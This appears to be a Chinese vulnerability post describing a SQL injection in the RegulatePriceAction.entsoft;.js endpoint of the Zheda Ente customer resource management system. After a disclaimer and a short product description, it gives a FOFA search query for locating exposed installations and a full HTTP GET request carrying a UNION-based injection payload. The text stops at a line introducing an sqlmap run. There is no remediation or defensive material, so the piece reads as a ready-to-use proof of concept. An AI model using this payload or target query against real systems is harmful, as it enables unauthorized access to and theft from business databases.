浙大恩特客户资源管理系统 RegulatePriceAction.entsoft；.js接口存在SQL注入漏洞

声明：

本文仅用于技术交流，请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

简介

浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源，提升销售和市场营销的效果。

浙大恩特客户资源管理系统的RegulatePriceAction.entsoft;.js接口存在SQL注入漏洞。

资产搜索

fofa

title="欢迎使用浙大恩特客户资源管理系统"

漏洞复现

GET /entsoft/RegulatePriceAction.entsoft;.js?method=getRegulatePricedlist&regulatepcnum=1'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,121*121,111*1111--+aaaa HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=59C0170BD803336080FD2CDE4F78F3D4
If-None-Match: W/"29804-1565851656884"
If-Modified-Since: Thu, 15 Aug 2019 06:47:36 GMT
Connection: close

sqlmap跑一下：